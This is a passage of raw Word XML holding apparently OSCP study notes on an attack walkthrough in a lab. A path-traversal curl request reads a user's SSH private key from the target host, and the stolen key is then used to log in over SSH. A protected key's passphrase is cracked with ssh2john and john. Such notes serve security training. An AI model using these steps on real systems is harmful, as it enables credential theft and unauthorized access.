                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 7: Content of SSH Private Key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7 shows that we successfully retrieved the private key for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user. Reviewing the output, we'll notice that its formatting is a bit messy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During web application assessments, we should understand that as soon as we've identified a possible vulnerability, such as with the "page" parameter in this case, we should not rely on a browser for testing. Browsers often try to parse or optimize elements for user friendliness. When performing web application testing, we should mainly use tools such as</w:t>
      </w:r>
      <w:hyperlink r:id="rId267">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId268">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Burp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:hyperlink r:id="rId269">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId270">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cURL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, or a programming language of our choice.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to retrieve the SSH private key as we did with the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="115" name="image105.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image105.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 9 shows that the SSH private key is formatted better using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> than in the browser. However, the HTML code of the web page is returned in the output as well. Let's copy the SSH private key beginning at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-----BEGIN OPENSSH PRIVATE KEY-----</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ending at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-----END OPENSSH PRIVATE KEY-----</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the terminal and paste it into a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dt_key</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the home directory for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's use the private key to connect to the target system via SSH on port 2222. We can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to specify the stolen private key file and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify the port. Before we can use the private key, we'll need to modify the permissions of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dt_key</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file so that only the user / owner can read the file; if we don't, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> program will throw an error stating that the access permissions are too open.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ ssh -i dt_key -p 2222 offsec@mountaindesserts.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="499" name="image480.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image480.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CDB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the SSH private key is protected by a passphrase, then look below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CDC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CDD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yf3ye7obe2o4" w:id="114"/>
      <w:bookmarkEnd w:id="114"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stealing SSH Keys that have passphrases and cracking them</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CDE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from OSCP (27.2.1. Initial Foothold):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CDF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's attempt to leverage this key to access WEBSRV1 as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">daniela</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> via SSH. To do so, we have to modify the file permissions as we have done several times in this course.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1206500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="503" name="image483.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image483.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27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CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="902"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa daniela@192.168.50.244</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 13 shows that the SSH private key is protected by a passphrase. Therefore, let's attempt to crack it using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh2john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wordlist. After a few moments, the cracking attempt is successful as shown in the following listing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1409700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="153" name="image167.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image167.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId274"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="685"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh2john id_rsa &gt; ssh.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="685"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that cracking doesn't work, then take a more elaborate approach to find the mode for cracking:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4174935" cy="3586163"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="330" name="image312.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image312.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId275"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4174935"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We ignore the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sshng</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" at the start since it's just a JohnTheRipper tag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 15.2.5. SSH Private Key Passphrase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CEB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CEC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CED">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, let's attempt to access the system again via SSH by providing the passphrase.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CEE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
